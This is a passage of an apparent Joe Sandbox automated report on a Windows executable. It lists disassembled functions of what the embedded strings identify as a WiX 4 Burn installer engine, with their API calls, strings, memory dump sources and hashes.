                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CreateFile
                                                                                                                                                                                                                                                                            • String ID: Attempted to check filename, but no filename was provided$Failed to check size of file %ls by handle$Failed to open file %ls while checking file size$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1722934493-3491284254
                                                                                                                                                                                                                                                                            • Opcode ID: 73b0a8d9430cae7635f1b306636478516c4f9167356d065b1d29d65abeb24429
                                                                                                                                                                                                                                                                            • Instruction ID: 79398127a3bc865225234566daa03a1dfa3238c2b9d9f9b5147ca668bf6acce2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73b0a8d9430cae7635f1b306636478516c4f9167356d065b1d29d65abeb24429
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4621C573AC132536E63221695C8FFBF651CEB46B64F018115FE58BB1C2E6648E0091F1
                                                                                                                                                                                                                                                                            Function 0093B5FE Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000001,?,?,008E7C8C), ref: 0093B6F1
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 0093B687
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008E7C8C,?,?,?,?,?,?,?), ref: 0093B693
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: Failed to load ntdll.dll$Failed to load ntdll.dll.$Failed to locate RtlGetVersion.$RtlGetVersion$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 1529210728-3252241749
                                                                                                                                                                                                                                                                            • Opcode ID: a65ef8ecd839665076d0c15b4bca9e925253427bc32dca313bc92be6a34a17cd
                                                                                                                                                                                                                                                                            • Instruction ID: 0fbf712deb6dbcf682231f232edec4fd52005b57e7bed316c31220859a89b039
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a65ef8ecd839665076d0c15b4bca9e925253427bc32dca313bc92be6a34a17cd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A214C72740315B7E7205A99CC8FF5E35ACEB46B2CF14403BB704B7182E7B44D009A54
                                                                                                                                                                                                                                                                            Function 008E8AA9 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 65registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 008E8B61
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-118609244
                                                                                                                                                                                                                                                                            • Opcode ID: 1d86f6b93360e8a39b3ca33e19d098fab4f927dcedad09326213a5db57d3bcc7
                                                                                                                                                                                                                                                                            • Instruction ID: 60032eb3a0284010af8e8dc43eed213f4a8d104a724cf1810bd938837bb6f7a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d86f6b93360e8a39b3ca33e19d098fab4f927dcedad09326213a5db57d3bcc7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56110A72B84364F6EF21D7479C0FF9E6964EB92B66F100111FE08FA1D196F089049691
                                                                                                                                                                                                                                                                            Function 008E13DA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 45libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,00000000,008E15E3,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13ED
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13F9
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008E1444
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008E1455
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorHandleLastModule
                                                                                                                                                                                                                                                                            • String ID: Failed to get module handle for kernel32.$SetDefaultDllDirectories$SetDllDirectoryW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp$kernel32
                                                                                                                                                                                                                                                                            • API String ID: 3392887714-1639946792
                                                                                                                                                                                                                                                                            • Opcode ID: eb136a1beedba8cfd583c3f9fb89beec58b0dd97e153ea0e0c38bfc06b1f0e68
                                                                                                                                                                                                                                                                            • Instruction ID: cb8cff849f32486772d51266ebf14cfc68a83554eca87c2fa6381689df1ae35b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb136a1beedba8cfd583c3f9fb89beec58b0dd97e153ea0e0c38bfc06b1f0e68
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A601267BA622302BD7B157256C0EF9A2998FB87B69F010119FE14F72D0D2B04880D6D4
                                                                                                                                                                                                                                                                            Function 00924A1B Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000000,?), ref: 00924A38
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 00924C1C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • BA did not provide container or payload id., xrefs: 00924BF4
                                                                                                                                                                                                                                                                            • BA requested unknown payload with id: %ls, xrefs: 00924A9B
                                                                                                                                                                                                                                                                            • Failed to set download URL., xrefs: 00924B31
                                                                                                                                                                                                                                                                            • Failed to set download user., xrefs: 00924B65
                                                                                                                                                                                                                                                                            • Engine is active, cannot change engine state., xrefs: 00924A50
                                                                                                                                                                                                                                                                            • BA requested unknown container with id: %ls, xrefs: 00924AE3
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\externalengine.cpp, xrefs: 00924A62, 00924AF5, 00924C0B
                                                                                                                                                                                                                                                                            • Failed to set download password., xrefs: 00924B99
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: BA did not provide container or payload id.$BA requested unknown container with id: %ls$BA requested unknown payload with id: %ls$Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-103459661
                                                                                                                                                                                                                                                                            • Opcode ID: 48138a41bc01f6e524582d7df41fd2f9952ddc365dc460bb257964368367916d
                                                                                                                                                                                                                                                                            • Instruction ID: 32426c0c7e92c9dbb312dfd0486cfbc1185ef7c5e0066f5b0082713197424010
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48138a41bc01f6e524582d7df41fd2f9952ddc365dc460bb257964368367916d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C513371A81626BBDB21EB69DC46F9A76ACBF10B00F010121FA04FB185E3B0DD50CBA1
                                                                                                                                                                                                                                                                            Function 00912190 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 166registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,-80000001,56800040,00020019,00000001,008E6EDE,008E6DEA,00000000,008E6E32,008E6EDE,008E7162,008E6DEA), ref: 00912362
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to read QuietUninstallString., xrefs: 0091233A
                                                                                                                                                                                                                                                                            • Failed to compare versions., xrefs: 009122DC
                                                                                                                                                                                                                                                                            • Failed to read DisplayVersion., xrefs: 00912282
                                                                                                                                                                                                                                                                            • Failed to open registry key: %ls., xrefs: 00912226
                                                                                                                                                                                                                                                                            • DisplayVersion, xrefs: 00912256
                                                                                                                                                                                                                                                                            • QuietUninstallString, xrefs: 00912315
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\exeengine.cpp, xrefs: 00912238, 0091234C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: DisplayVersion$Failed to compare versions.$Failed to open registry key: %ls.$Failed to read DisplayVersion.$Failed to read QuietUninstallString.$QuietUninstallString$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-915021512
                                                                                                                                                                                                                                                                            • Opcode ID: 21516708cc916a87e17a34b155800b13838f4bfa9391e3f8f58c851ee25abfaa
                                                                                                                                                                                                                                                                            • Instruction ID: 110f87eda68210f490faae02a8d81419c74440548c418b94e188885461edf71c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21516708cc916a87e17a34b155800b13838f4bfa9391e3f8f58c851ee25abfaa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19512871F40219FBDB25AFA8CC46BEEB6A8AF04B10F054524B925BB190D2749EA1D790
                                                                                                                                                                                                                                                                            Function 00946074 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 163registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,?,00000000), ref: 00946212
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to compare path from pending file rename to check path., xrefs: 00946221
                                                                                                                                                                                                                                                                            • Failed to read pending file renames., xrefs: 00946114
                                                                                                                                                                                                                                                                            • Failed to update pending file renames., xrefs: 009461DD
                                                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 009460E8, 009461CA
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\file2utl.cpp, xrefs: 009461EC
                                                                                                                                                                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00946085
                                                                                                                                                                                                                                                                            • Failed to open pending file rename registry key., xrefs: 009460C7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to compare path from pending file rename to check path.$Failed to open pending file rename registry key.$Failed to read pending file renames.$Failed to update pending file renames.$PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\file2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-1055086927
                                                                                                                                                                                                                                                                            • Opcode ID: 591cd3d226f06430027a64458fb8f9e5eecb0b1e71937739cb0db4311008e14d
                                                                                                                                                                                                                                                                            • Instruction ID: bbd92ce5e83023a16690638a19b17136ccd893236c1241e875bff9e092e3d31f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 591cd3d226f06430027a64458fb8f9e5eecb0b1e71937739cb0db4311008e14d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C15103B1E44215FBCB309E99CC46FAEBBB8EF46700F154559A900BB292D671DE00DB92
                                                                                                                                                                                                                                                                            Function 00907460 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 153COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5C41: CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,?,000000FF), ref: 008F5C6E
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,?,?,?), ref: 00907566
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to find package: %ls$Failed to read compatible package id.$Failed to read package id.$Failed to remove from cache compatible package: %ls$Package '%ls' has no compatible package to clean.$Package '%ls' has no compatible package with id: %ls$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-529956491
                                                                                                                                                                                                                                                                            • Opcode ID: a1bb5b409683b306595d2457c10f1cf36a5c62784becf34b8c0ec7798ea53f81
                                                                                                                                                                                                                                                                            • Instruction ID: 3416f69333ce46dbaf937c168c5c5e7e206f72df003f10dd8dcdd8862c2260a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1bb5b409683b306595d2457c10f1cf36a5c62784becf34b8c0ec7798ea53f81
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40410371E40658BFEF119AD5CC4AFEFBA79EB44720F104511FA11BA1D0D2B2AE10E7A1
                                                                                                                                                                                                                                                                            Function 00948464 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009439DD: SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439F5
                                                                                                                                                                                                                                                                              • Part of subcall function 009439DD: GetLastError.KERNEL32(?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439FF
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009484E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLastPointerWrite
                                                                                                                                                                                                                                                                            • String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 972348794-1106238538
                                                                                                                                                                                                                                                                            • Opcode ID: cb85a87854bcb29750ddcfd1c25ccebd33a42e8a43be58afacb27c2d195ad0b3
                                                                                                                                                                                                                                                                            • Instruction ID: fd6916a6881ba236c07e5cf97e2920bea4a86b659e01f3f7504f48f9eea062a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb85a87854bcb29750ddcfd1c25ccebd33a42e8a43be58afacb27c2d195ad0b3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42411673A50219BBEB218E84DC4AFAF7A6CEF00B54F014195FD04BA190EB74DD10DBA0
                                                                                                                                                                                                                                                                            Function 008E65B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 132COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E165F: WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,0090EC52,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 008E1673
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000002,?,00000000,000000FF,00000000), ref: 008E65FF
                                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?), ref: 008E6615
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E661F
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008E6629
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B324: EnterCriticalSection.KERNEL32(0097D4F0,00000000,?,008E8067,00000000,00000000,?,?,?,?,?,?,?), ref: 0093B32E
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B324: LeaveCriticalSection.KERNEL32(0097D4F0,?,008E8067,00000000,00000000,?,?,?,?,?,?,?), ref: 0093B345
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E66A6, 008E66C2, 008E66EF
                                                                                                                                                                                                                                                                            • Failed to wait log message over pipe., xrefs: 008E6666
                                                                                                                                                                                                                                                                            • Failed to wait for log thread events, signaled: %u., xrefs: 008E66DD
                                                                                                                                                                                                                                                                            • Failed to reset log event., xrefs: 008E66B0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$ErrorEventLastMultipleObjectsResetWait
                                                                                                                                                                                                                                                                            • String ID: Failed to reset log event.$Failed to wait for log thread events, signaled: %u.$Failed to wait log message over pipe.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3117541546-2819198451
                                                                                                                                                                                                                                                                            • Opcode ID: 044d63462e6304ed8bb8be4fea3f3c9edacc89cc2d47d5a466d2f8bc787cb8fe
                                                                                                                                                                                                                                                                            • Instruction ID: d8155dbc37c1701ea046a6980edf16f00f77e155e4dff34c8bbc9db46d50c97b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 044d63462e6304ed8bb8be4fea3f3c9edacc89cc2d47d5a466d2f8bc787cb8fe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E941FA71A40355B7DB10ABA6CC4AF5E76B4FF72755F100114FB00F91D1E7B099609AD1
                                                                                                                                                                                                                                                                            Function 009455DB Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 131registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00944F04: lstrlenW.KERNEL32(008E7162,008E6DEA,?,?,?,00945488,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817), ref: 00944F2A
